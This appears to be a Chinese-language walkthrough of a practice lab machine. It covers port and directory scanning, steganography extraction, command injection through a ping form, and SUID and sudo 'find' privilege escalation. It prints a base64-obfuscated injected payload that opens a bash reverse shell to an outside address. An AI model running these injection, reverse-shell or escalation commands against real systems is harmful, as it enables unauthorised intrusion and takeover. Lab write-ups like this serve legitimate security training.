提示
图片隐写
命令执行绕过
端口扫描&服务探测&漏洞探测
nmap -p- 172.16.33.49
nmap -p80 -sV 172.16.33.49
这个版本的apache是有目录穿越和RCE漏洞的,但是没有成功
nmap -p80 --script=vuln 172.16.33.49
没什么有用的信息
目录扫描
dirsearch -u http://172.16.33.49/
访问默认页面
尝试了一下,这个页面没什么用,标题也明示了这是个假的Admin Area
1. 敏感信息收集
admin
目录
admin
目录页面放了三张图片,照例看下页面源码
发现passphrase:harder
,图片隐写解密的时候会提示输入passphrase
,所以尝试进行图片隐写的信息提取
2. 图片隐写
将三张图片都下载到本地,使用steghide
依次尝试提取
steghide extract -sf haclabs.jpeg
提取出一个文件,读取一下发现superadmin.php
边界突破
superadmin.php
页面
这里尝试一下,会对输入的IP进行ping,可能存在命令执行
1. 命令执行
这里经过尝试可以通过拼接进行命令执行
但是没法执行ls
命令,猜测可能存在黑白名单过滤,需要多找个payload
进行尝试
2. 反弹shell
经过多轮尝试,找到可以执行的命令
127.0.0.1 | echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjguMC4xNDkvNDQ0NSA8JjEK | base64 -d | bash
使用python
升级shell(获取完整shell),经常用到的命令,需要的自行查询吧。
提权
1. suid提权
可以通过find
命令提权
find . -exec /bin/sh -p \; -quit
2. sudo提权
在yash
用户家目录,发现flag1.txt
文件,通过查看内容,获得提示
通过全局搜索,查找到隐藏文件
查看隐藏文件,获得haclabs
用户密码:haclabs1234
查看flag2.txt
文件内容,没有提示了
但是可以通过sudo find
进行提权
sudo find . -exec /bin/sh \; -quit